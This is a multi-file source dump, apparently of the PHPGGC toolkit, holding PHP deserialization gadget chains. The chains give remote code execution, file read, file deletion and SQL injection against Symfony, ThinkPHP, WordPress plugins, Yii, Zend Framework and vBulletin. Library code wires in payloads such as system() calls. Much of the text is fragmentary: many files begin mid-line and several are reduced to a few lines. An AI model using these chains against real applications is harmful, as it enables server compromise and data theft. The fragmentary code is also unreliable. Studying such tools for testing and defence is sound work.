--------------------------------------------------------------------------------
/gadgetchains/Symfony/RCE/3/chain.php:
--------------------------------------------------------------------------------
1 | )';
11 |
12 | public function generate(array $parameters)
13 | {
14 | $code = $parameters['code'];
15 |
16 | return new \Symfony\Component\Process\Pipes\WindowsPipes(
17 | new \Symfony\Component\Finder\Expression\Expression(
18 | new \Symfony\Component\Templating\PhpEngine(
19 | new \Symfony\Component\Templating\Storage\StringStorage(
20 | $code
21 | ))));
22 | }
23 | }
24 |
--------------------------------------------------------------------------------
/gadgetchains/Symfony/RCE/3/gadgets.php:
--------------------------------------------------------------------------------
1 | template = '';
8 | }
9 | }
10 | }
11 |
12 | namespace Symfony\Component\Templating{
13 | class TemplateNameParser{}
14 | class TemplateReference{}
15 | class PhpEngine{
16 | protected $parser;
17 | protected $cache;
18 | protected $current;
19 | protected $globals = array();
20 | public function __construct($s){
21 | $this->parser = new TemplateNameParser;
22 | $this->current = new TemplateReference;
23 | $this->cache = array(NULL=>$s);
24 | }
25 | }
26 | }
27 |
28 | namespace Symfony\Component\Finder\Expression{
29 | class Expression{
30 | private $value;
31 | public function __construct($p){
32 | $this->value = $p;
33 | }
34 | }
35 | }
36 |
37 | namespace Symfony\Component\Process\Pipes{
38 | class WindowsPipes{
39 | private $files = array();
40 | public function __construct($e){
41 | $this->files = array($e);
42 | }
43 | }
44 | }
45 |
46 | ?>
47 |
--------------------------------------------------------------------------------
/gadgetchains/Symfony/RCE/4/chain.php:
--------------------------------------------------------------------------------
1 |
28 |
--------------------------------------------------------------------------------
/gadgetchains/Symfony/RCE/4/gadgets.php:
--------------------------------------------------------------------------------
1 | poolHash = $poolHash;
12 | $this-> innerItem = $parameter;
13 | }
14 | }
15 | }
16 |
17 | namespace Symfony\Component\Cache\Adapter {
18 |
19 | class ProxyAdapter
20 | {
21 | private $poolHash ;
22 | private $setInnerItem;
23 | public function __construct($poolHash, $function)
24 | {
25 | $this-> poolHash = $poolHash;
26 | $this-> setInnerItem = $function;
27 | }
28 | }
29 |
30 | class TagAwareAdapter
31 | {
32 | private $deferred = [];
33 | private $pool;
34 | public function __construct($deferred, $pool)
35 | {
36 | $this-> deferred = $deferred;
37 | $this-> pool = $pool;
38 | }
39 | }
40 | }
41 |
42 | ?>
43 |
--------------------------------------------------------------------------------
/gadgetchains/Symfony/RCE/5/chain.php:
--------------------------------------------------------------------------------
1 | deferred = $parameter;
13 | $this->getTagsByKey = $function;
14 | }
15 | }
16 | }
17 |
--------------------------------------------------------------------------------
/gadgetchains/Symfony/RCE/8/chain.php:
--------------------------------------------------------------------------------
1 | fileHandles = $fileHandles;
12 | }
13 | }
14 | }
15 |
16 | namespace Symfony\Component\Finder\Iterator
17 | {
18 | class SortableIterator
19 | {
20 | private $iterator;
21 | private $sort;
22 |
23 | function __construct($iterator, $sort)
24 | {
25 | $this->iterator = $iterator;
26 | $this->sort = $sort;
27 | }
28 | }
29 | }
30 |
31 | namespace Symfony\Component\Console\Input
32 | {
33 | class ArrayInput
34 | {
35 | private $parameters;
36 |
37 | function __construct($parameters)
38 | {
39 | $this->parameters = $parameters;
40 | }
41 | }
42 | }
43 |
--------------------------------------------------------------------------------
/gadgetchains/TCPDF/FD/1/chain.php:
--------------------------------------------------------------------------------
1 | imagekeys = [
8 | $remote_path
9 | ];
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/gadgetchains/ThinkPHP/RCE/1/chain.php:
--------------------------------------------------------------------------------
1 | files = array($files);
9 | }
10 | }
11 | }
12 |
13 | namespace think\model\concern {
14 | trait Conversion
15 | {
16 | protected $append = array("smi1e" => "1");
17 | }
18 |
19 | trait Attribute
20 | {
21 | private $data;
22 | private $withAttr = array("smi1e" => "system");
23 |
24 | public function get($system)
25 | {
26 | $this->data = array("smi1e" => "$system");
27 | }
28 | }
29 | }
30 | namespace think {
31 | abstract class Model
32 | {
33 | use model\concern\Attribute;
34 | use model\concern\Conversion;
35 | }
36 | }
37 |
38 | namespace think\model{
39 | use think\Model;
40 | class Pivot extends Model
41 | {
42 | public function __construct($system)
43 | {
44 | $this->get($system);
45 | }
46 | }
47 | }
--------------------------------------------------------------------------------
/gadgetchains/ThinkPHP/RCE/2/chain.php:
--------------------------------------------------------------------------------
1 | extensionBackupPath = $extensionBackupPath;
11 | }
12 |
13 | }
14 |
--------------------------------------------------------------------------------
/gadgetchains/WordPress/Dompdf/RCE/1/chain.php:
--------------------------------------------------------------------------------
1 | $parameter, 'Value' => ''], $function)
19 | );
20 | }
21 | }
--------------------------------------------------------------------------------
/gadgetchains/WordPress/Guzzle/RCE/1/gadgets.php:
--------------------------------------------------------------------------------
1 | data = $data;
17 | }
18 |
19 | /*
20 | public function __toString()
21 | {
22 | $str = $this->data['Name'] . '=' . $this->data['Value'] . '; ';
23 | foreach ($this->data as $k => $v) {
24 | if ($k !== 'Name' && $k !== 'Value' && $v !== null && $v !== false) {
25 | if ($k === 'Expires') {
26 | $str .= 'Expires=' . gmdate('D, d M Y H:i:s \G\M\T', $v) . '; ';
27 | } else {
28 | $str .= ($v === true ? $k : "{$k}={$v}") . '; ';
29 | }
30 | }
31 | }
32 | return rtrim($str, '; ');
33 | }
34 | */
35 | }
36 | }
--------------------------------------------------------------------------------
/gadgetchains/WordPress/Guzzle/RCE/2/chain.php:
--------------------------------------------------------------------------------
1 | $parameter, 'Value' => ''], $function)
19 | );
20 |
21 | return new \GuzzleHttp\Cookie\FileCookieJar($g);
22 | }
23 | }
--------------------------------------------------------------------------------
/gadgetchains/WordPress/P/EmailSubscribers/RCE/1/chain.php:
--------------------------------------------------------------------------------
1 | handles = $handles;
12 | }
13 |
14 | /*
15 | public function __destruct() {
16 | foreach ( $this->handles as $handle ) {
17 | if ( is_resource( $handle ) ) {
18 | fclose( $handle ); // @codingStandardsIgnoreLine.
19 | }
20 | }
21 | }
22 | */
23 | }
24 |
--------------------------------------------------------------------------------
/gadgetchains/WordPress/P/EverestForms/RCE/1/chain.php:
--------------------------------------------------------------------------------
1 | handles = $handles;
12 | }
13 |
14 | /*
15 | public function __destruct() {
16 | foreach ( $this->handles as $handle ) {
17 | if ( is_resource( $handle ) ) {
18 | fclose( $handle ); // phpcs:ignore WordPress.WP.AlternativeFunctions.file_system_read_fclose
19 | }
20 | }
21 | }
22 | */
23 | }
24 |
--------------------------------------------------------------------------------
/gadgetchains/WordPress/P/WooCommerce/RCE/1/chain.php:
--------------------------------------------------------------------------------
1 | handles = $handles;
12 | }
13 |
14 | /*
15 | public function __destruct() {
16 | foreach ( $this->handles as $handle ) {
17 | if ( is_resource( $handle ) ) {
18 | fclose( $handle ); // @codingStandardsIgnoreLine.
19 | }
20 | }
21 | }
22 | */
23 | }
24 |
--------------------------------------------------------------------------------
/gadgetchains/WordPress/P/WooCommerce/RCE/2/chain.php:
--------------------------------------------------------------------------------
1 | _handles = $handles;
14 | }
15 | }
16 |
--------------------------------------------------------------------------------
/gadgetchains/WordPress/P/YetAnotherStarsRating/RCE/1/chain.php:
--------------------------------------------------------------------------------
1 | ` at the end of the file
11 | to close the php `data = [
12 | 'Expires' => 1,
13 | 'Discard' => false,
14 | 'Value' => $data
15 | ];
16 | }
17 | }
18 |
19 | class CookieJar
20 | {
21 | private $cookies = [];
22 | private $strictMode;
23 |
24 | public function __construct($data)
25 | {
26 | $this->cookies = [new SetCookie($data)];
27 | }
28 | }
29 |
30 | class FileCookieJar extends CookieJar
31 | {
32 | private $filename;
33 | private $storeSessionCookies = true;
34 |
35 | public function __construct($filename, $data)
36 | {
37 | parent::__construct($data);
38 | $this->filename = $filename;
39 | }
40 | }
41 | }
--------------------------------------------------------------------------------
/gadgetchains/WordPress/PHPExcel/RCE/1/chain.php:
--------------------------------------------------------------------------------
1 | richTextElements = $richTextElements;
11 | }
12 |
13 | /*
14 | public function getPlainText() {
15 | // Return value
16 | $returnValue = '';
17 |
18 | // Loop through all PHPExcel_RichText_ITextElement
19 | foreach ($this->richTextElements as $text) {
20 | $returnValue .= $text->getText();
21 | }
22 |
23 | // Return
24 | return $returnValue;
25 | }
26 |
27 | public function __toString() {
28 | return $this->getPlainText();
29 | }
30 | */
31 | }
--------------------------------------------------------------------------------
/gadgetchains/WordPress/PHPExcel/RCE/2/chain.php:
--------------------------------------------------------------------------------
1 | _richTextElements = $richTextElements;
11 | }
12 |
13 | /*
14 | public function getPlainText() {
15 | // Return value
16 | $returnValue = '';
17 |
18 | // Loop through all PHPExcel_RichText_ITextElement
19 | foreach ($this->_richTextElements as $text) {
20 | $returnValue .= $text->getText();
21 | }
22 |
23 | // Return
24 | return $returnValue;
25 | }
26 |
27 | public function __toString() {
28 | return $this->getPlainText();
29 | }
30 | */
31 | }
--------------------------------------------------------------------------------
/gadgetchains/WordPress/PHPExcel/RCE/3/chain.php:
--------------------------------------------------------------------------------
1 | bookmark_name = $bookmark_name;
13 | $this->on_destroy = $on_destroy;
14 | }
15 | }
16 | }
17 |
--------------------------------------------------------------------------------
/gadgetchains/Yii/RCE/1/chain.php:
--------------------------------------------------------------------------------
1 | _d = $_d;
12 | }
13 | }
14 |
15 | class CDbCriteria
16 | {
17 | function __construct($params)
18 | {
19 | $this->params = $params;
20 | }
21 | }
22 |
23 | class CFileCache
24 | {
25 | public $keyPrefix = '';
26 | public $hashKey = false;
27 | public $serializer;
28 |
29 | public $cachePath = 'data:text/';
30 | public $directoryLevel = 0;
31 | public $embedExpiry = true;
32 | public $cacheFileSuffix;
33 |
34 | function __construct($function, $cacheFileSuffix)
35 | {
36 | $this->serializer = [1 => $function];
37 | $this->cacheFileSuffix = ';base64,' . $cacheFileSuffix;
38 | }
39 | }
--------------------------------------------------------------------------------
/gadgetchains/Yii/RCE/2/chain.php:
--------------------------------------------------------------------------------
1 | categoryMap = $categoryMap;
10 | }
11 | }
12 |
13 | class Connection {
14 | public $pdo = 1;
15 |
16 | function __construct($dsn) {
17 | $this->dsn = $dsn;
18 | }
19 | }
20 |
21 | class BatchQueryResult {
22 | private $_dataReader;
23 |
24 | function __construct($dataReader) {
25 | $this->_dataReader = $dataReader;
26 | }
27 | }
28 | }
29 |
30 | namespace yii\caching {
31 | class ArrayCache {
32 | public $serializer;
33 | private $_cache;
34 |
35 | function __construct($function, $parameter) {
36 | $this->serializer = [1 => $function];
37 | $this->_cache = ['x' => [$parameter, 0]];
38 | }
39 | }
40 | }
41 |
--------------------------------------------------------------------------------
/gadgetchains/Yii2/RCE/2/chain.php:
--------------------------------------------------------------------------------
1 | writeCallback = $writeCallback;
10 | }
11 | }
12 | }
13 |
14 | namespace yii\caching
15 | {
16 | class ExpressionDependency
17 | {
18 | public $expression;
19 |
20 | function __construct($expression) {
21 | $this->expression = $expression;
22 | }
23 | }
24 | }
25 |
26 | namespace yii\db {
27 | class BatchQueryResult {
28 | private $_dataReader;
29 |
30 | function __construct($dataReader) {
31 | $this->_dataReader = $dataReader;
32 | }
33 | }
34 | }
35 |
36 | ?>
37 |
--------------------------------------------------------------------------------
/gadgetchains/ZendFramework/FD/1/chain.php:
--------------------------------------------------------------------------------
1 | _cleanup = $cleanup;
13 | $this->stream_name = $stream_name;
14 | }
15 |
16 | }
--------------------------------------------------------------------------------
/gadgetchains/ZendFramework/RCE/2/chain.php:
--------------------------------------------------------------------------------
1 | = 7.0.0
14 | ';
15 |
16 | public function generate(array $parameters)
17 | {
18 | return new \Zend_Log(
19 | [new \Zend_Log_Writer_Mail(
20 | [1],
21 | [],
22 | new \Zend_Mail,
23 | new \Zend_Layout(
24 | new \Zend_Filter_Inflector(),
25 | true,
26 | $parameters['code']
27 | )
28 | )]
29 | );
30 | }
31 | }
--------------------------------------------------------------------------------
/gadgetchains/ZendFramework/RCE/5/chain.php:
--------------------------------------------------------------------------------
1 | tempFilesToDelete[] = $tempFileToDelete;
9 | }
10 |
11 | }
12 |
--------------------------------------------------------------------------------
/gadgetchains/vBulletin/RCE/1/chain.php:
--------------------------------------------------------------------------------
1 | enhancements = $enhancements;
12 | }
13 |
14 | /**
15 | * Calls method $method on every enhancement.
16 | */
17 | public function __call($method, $arguments)
18 | {
19 | $argument = $arguments[0];
20 | foreach($this->enhancements as $enhancement)
21 | {
22 | $argument = $enhancement->$method(
23 | $argument
24 | );
25 | }
26 | return $argument;
27 | }
28 | }
--------------------------------------------------------------------------------
/lib/PHPGGC/Enhancement/PlusNumbers.php:
--------------------------------------------------------------------------------
1 | O:+3:"Abc":+1:{s:+1:"x";i:+3;}
9 | * With 's':
10 | * O:3:"Abc":1:{s:1:"x";i:3;} -> O:3:"Abc":1:{s:+1:"x";i:3;}
11 | *
12 | * Note: Since PHP 7.2, only i and d (float) types can be prefixed by
13 | * a plus sign.
14 | */
15 | class PlusNumbers extends Enhancement
16 | {
17 | private $types;
18 |
19 | public function __construct($types)
20 | {
21 | $this->types = $types;
22 | }
23 |
24 | public function process_serialized($serialized)
25 | {
26 | $types = preg_quote($this->types, '#');
27 | $serialized = preg_replace(
28 | '#\b([' . $types . ']):(\d+)([:;])#',
29 | '$1:+$2$3',
30 | $serialized
31 | );
32 | return $serialized;
33 | }
34 | }
--------------------------------------------------------------------------------
/lib/PHPGGC/Exception.php:
--------------------------------------------------------------------------------
1 | \PHPGGC\Util::rand_file('test file delete')
18 | ];
19 | }
20 |
21 | public function test_confirm($arguments, $output)
22 | {
23 | return !file_exists($arguments['remote_path']);
24 | }
25 |
26 | public function test_cleanup($arguments)
27 | {
28 | if(file_exists($arguments['remote_path']))
29 | unlink($arguments['remote_path']);
30 | }
31 | }
--------------------------------------------------------------------------------
/lib/PHPGGC/GadgetChain/FileInclude.php:
--------------------------------------------------------------------------------
1 | \PHPGGC\Util::rand_file('')
18 | ];
19 | }
20 |
21 | public function test_confirm($arguments, $output)
22 | {
23 | return strpos($output, "testfileinclude") !== false;
24 | }
25 |
26 | public function test_cleanup($arguments)
27 | {
28 | if(file_exists($arguments['remote_path']))
29 | unlink($arguments['remote_path']);
30 | }
31 | }
--------------------------------------------------------------------------------
/lib/PHPGGC/GadgetChain/FileRead.php:
--------------------------------------------------------------------------------
1 | \PHPGGC\Util::rand_file('test file read')
18 | ];
19 | }
20 |
21 | public function test_confirm($arguments, $output)
22 | {
23 | $expected = file_get_contents($arguments['remote_path']);
24 | return strpos($output, $expected) !== false;
25 | }
26 |
27 | public function test_cleanup($arguments)
28 | {
29 | if(file_exists($arguments['remote_path']))
30 | unlink($arguments['remote_path']);
31 | }
32 | }
--------------------------------------------------------------------------------
/lib/PHPGGC/GadgetChain/PHPInfo.php:
--------------------------------------------------------------------------------
1 | _test_build_command();
21 | return [
22 | 'command' => $command
23 | ];
24 | }
25 |
26 | }
--------------------------------------------------------------------------------
/lib/PHPGGC/GadgetChain/RCE/FunctionCall.php:
--------------------------------------------------------------------------------
1 | _test_build_command();
22 | return [
23 | 'function' => 'system',
24 | 'parameter' =>
25 | $command
26 | ];
27 | }
28 |
29 | }
30 |
--------------------------------------------------------------------------------
/lib/PHPGGC/GadgetChain/RCE/PHPCode.php:
--------------------------------------------------------------------------------
1 | _test_build_command();
23 | return [
24 | 'code' => 'system(' . var_export($command, true) . ');'
25 | ];
26 | }
27 |
28 |
29 | }
--------------------------------------------------------------------------------
/lib/PHPGGC/GadgetChain/SQLI/MySQLAuthenticatedSQLI.php:
--------------------------------------------------------------------------------
1 |
24 |
--------------------------------------------------------------------------------
/lib/PHPGGC/GadgetChain/SqlInjection.php:
--------------------------------------------------------------------------------
1 | data, 0, -28);
13 | $signature = $this->compute_signature($data);
14 | $this->data = $this->in_place_replace($this->data, -28, $signature);
15 | }
16 | }
--------------------------------------------------------------------------------
/lib/PHPGGC/Phar/Zip.php:
--------------------------------------------------------------------------------
1 | generate();
13 | }
14 | catch(\PHPGGC\Exception $e)
15 | {
16 | print("ERROR: " . $e->getMessage() . "\n");
17 | exit(1);
18 | }
19 |
--------------------------------------------------------------------------------
/templates/chain.php:
--------------------------------------------------------------------------------
1 |